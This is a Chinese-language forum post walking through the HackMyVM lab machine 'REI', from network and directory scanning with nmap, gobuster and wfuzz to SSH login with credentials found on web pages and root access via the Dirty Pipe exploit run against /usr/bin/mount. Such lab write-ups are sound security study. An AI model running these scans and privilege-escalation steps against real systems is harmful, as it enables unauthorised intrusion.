QQ登录

只需一步,快速开始

切换到宽版 切换风格

电脑疯子技术论坛|电脑极客社区

hackmyvm系列8——REI

[复制链接]
27 0
前言:

*本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!所有环境均为在线下
载的靶场且在本机进行学习。

一、信息收集

netdiscover -r 192.168.56.0/24

nmap -sV -Pn -sC -A 192.168.56.170 -p 0-65535

QQ截图20220511111306.png

访问web端口
http://192.168.56.170:63777/
对其进行目录扫描
gobuster dir -u http://192.168.56.170:63777/ -w /usr/share/wordlists/dirbuster/dire
ctory-list-2.3-medium.txt -x txt,html

QQ截图20220511111348.png

并没有得到有价值的东西,返回web页面对其进行观察

QQ截图20220511111419.png

但是直接访问为404,对其后缀进行fuzz
wfuzz -u http://192.168.56.170:63777/indexp.FUZZ -w /usr/share/wordlists/dirbu
ster/directory-list-2.3-medium.txt --hl 11

100.png

发现有一些目录结构文件,对其进行保存后进行目录的爆破

gobuster dir -u http://192.168.56.170:63777 -w dic.txt

99.png

访问两个都为403,因此对其再次目录爆破

98.png

访问后

http://192.168.56.170:63777/gichin/your-button/note.html

QQ截图20220511111658.png

http://192.168.56.170:63777/gichin/your-button/ssh/为403,继续对其进行爆破

97.png

二、连接SSH

访问后得到一个秘钥文件

96.png

查看note.html页面,寻找用户名

点击人物图像,来带另外一个页面

http://192.168.56.170:63777/gichin/your-button/chuck-norris.html

95.png

信息,balance、karate,其中balance可能是个密码,尝试用karate作为用户名进行SSH登录。

其中需要密码,但是用balance作为密码失败了

94.png

查看页面源代码

23.png

尝试用chuck-norris作为用户名进行登录,密码balance

22.png

三、权限提升

上传提权辅助脚本

21.png

上传exp进行提权
gcc dirtypipez.c -o exp
chmod 777 exp
./exp /usr/bin/mount

20.png

但是查看root.txt的时候提示不行

19.png

寻找与Maritrini有关的文件

find / -name *maritrini*

18.png

得到root的flag

16.png

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

8404

主题
精彩推荐
热门资讯
网友晒图
图文推荐
Pcgho! X3.4

© 2020 Comsenz Inc.